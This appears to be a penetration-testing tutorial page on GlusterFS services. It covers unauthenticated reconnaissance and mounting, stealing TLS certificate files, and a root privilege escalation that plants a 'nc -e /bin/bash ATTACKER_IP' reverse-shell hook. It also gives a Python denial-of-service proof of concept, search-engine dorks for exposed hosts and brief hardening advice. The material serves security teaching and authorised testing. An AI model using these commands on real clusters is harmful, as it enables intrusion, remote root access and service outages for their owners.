--- title: "24007 - Glusterfs" weight: 24007-24008-24009-49152 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **24007-24008-24009-49152 - GlusterFS** 的渗透测试方法，适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- ### 信息收集 Install the client utilities on your attacking box: ```bash sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu ``` 1. **Peer discovery & health** ```bash ## List peers (works without authentication in default setups) gluster --remote-host 10.10.11.131 peer status ``` 2. **Volume reconnaissance** ```bash ## Retrieve the list of all volumes and their configuration gluster --remote-host 10.10.11.131 volume info all ``` 3. **Mount without privileges** ```bash sudo mount -t glusterfs 10.10.11.131:/ /mnt/gluster ``` If mounting fails, check `/var/log/glusterfs/-.log` on the client side. Common issues are: * TLS enforcement (`option transport.socket.ssl on`) * Address based access control (`option auth.allow `) #### Certificate troubleshooting Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log): ``` /etc/ssl/glusterfs.pem /etc/ssl/glusterfs.key /etc/ssl/glusterfs.ca ``` --- ### Known Vulnerabilities (2022-2025) | CVE | Affected versions | Impact | Notes | |-----|-------------------|--------|-------| | **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **拒绝服务** and probable 远程代码执行. Fixed in 10.4.1 / 11.1. | | **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. | | **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. | > Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades. #### Exploiting `gluster_shared_storage` (提权) Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with **root** on every node. ```bash ## 1. Mount admin volume anonymously mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss ## 2. Drop malicious script that gets synchronised cluster-wide cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh #!/bin/bash nc -e /bin/bash ATTACKER_IP 4444 & EOF chmod +x /tmp/gss/hooks/1/start/post/test.sh ## 3. Wait until glusterd distributes the hook and executes it as root ``` If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version. #### Denial-of-服务 PoC (CVE-2023-26253) ```python #!/usr/bin/env python3 ## Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007 import socket, xdrlib, struct p = xdrlib.Packer(); p.pack_uint(0xdeadbeef) with socket.create_connection(("10.10.11.131",24007)) as s: s.send(struct.pack("!L", len(p.get_buffer())|0x80000000)) s.send(p.get_buffer()) ``` Running the script crashes `glusterfsd` < 11.0. --- ### Hardening & Detection * **Upgrade** – current LTS is 11.1 (July 2025). All CVEs above are fixed. * Enable **TLS** for every brick: ```bash gluster volume set transport.socket.ssl on gluster volume set transport.socket.ssl-cert /etc/ssl/glusterfs.pem ``` * Restrict clients with CIDR lists: ```bash gluster volume set auth.allow 10.0.0.0/24 ``` * Expose management port 24007 only on a **private VLAN** or through SSH tunnels. * Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set features.audit-log on`). --- --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="24007" ``` #### Shodan ```bash # Shodan 搜索语法 port:24007 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:24007 ``` --- ## 📖 参考资料 - [HackTricks - 24007-glusterfs](https://book.hacktricks.wiki/en/network-services-pentesting/24007-glusterfs.html)